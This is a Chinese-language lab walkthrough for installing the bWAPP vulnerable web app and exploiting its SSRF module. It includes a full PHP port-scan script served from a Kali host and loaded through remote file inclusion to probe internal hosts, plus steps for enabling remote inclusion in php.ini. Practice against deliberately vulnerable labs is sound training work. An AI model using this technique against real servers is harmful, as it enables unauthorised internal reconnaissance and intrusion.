一、靶場介紹
集成了超過100餘個網絡漏洞,php web漏洞靶場,能夠調製漏洞難度等級(低->中->高)。
二、靶場搭建
2.1 安裝類型
搭建類型有兩種:(虛擬機版本可測試測漏洞類型更多,比如破殼、心臟滴血)
- 獨立安裝(部署到apache + php +mysql環境下)
- 虛擬機安裝(bee-box)
2.2 獨立安裝
》》下載解壓bwapp到本地web目錄下
》》編輯如下文件
》》訪問如下地址,進行安裝初始化
》》安裝完成
》》輸入用戶名:密碼,選擇安全等級進行登錄
》》登錄成功
三、漏洞實戰
SSRF
》》選擇SSRF漏洞,點擊Hack
》》如下的三個攻擊場景
- 利用遠程文件包含進行端口掃描(內網探測)
- 使用XXE進行文件讀取(文件讀取)
- 使用XXE進行SmartTV拒絕服務利用(漏洞利用)
遠程文件包含端口掃描
- 這裏利用的HTTP協議
》》點擊任務1中如下位置,獲取端口掃描腳本
》》如果沒有拿到,可以去如下文件位置取出
》》進入遠程文件包含漏洞模塊處進行利用
》》選擇語言點擊Go
》》可查看到get請求地址中請求的資源文件
》》這裏我們遠程包含一臺其它服務器資源驗證遠程包含是否成功(kali:192.168.226.134)
》》我們將之前的ssrf-1.txt端口掃描文件放入到kali的web目錄下:
(ssrf-1.txt腳本內容(php端口掃描腳本))
<?php
if(isset($_REQUEST["ip"]))
{
//list of port numbers to scan
$ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
$results = array();
foreach($ports as $port)
{
if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
{
$results[$port] = true;
fclose($pf);
}
else
{
$results[$port] = false;
}
}
foreach($results as $port=>$val)
{
$prot = getservbyport($port,"tcp");
echo "Port $port ($prot): ";
if($val)
{
echo "<span style=\"color:green\">OK</span><br/>";
}
else
{
echo "<span style=\"color:red\">Inaccessible</span><br/>";
}
}
}
?>
》》利用遠程包含探測端口
需要利用hackbar傳入post目標地址的ip,從下方可直觀看出掃描處的端口
》》也可以掃遠程內網的其它主機(如這裏的kali)
Tips:
問題:文件包含時報如下錯誤:
解決:
找到對應版本的php.ini php配置文件
啓動遠程文件包含(默認關閉)
保存文件重啓服務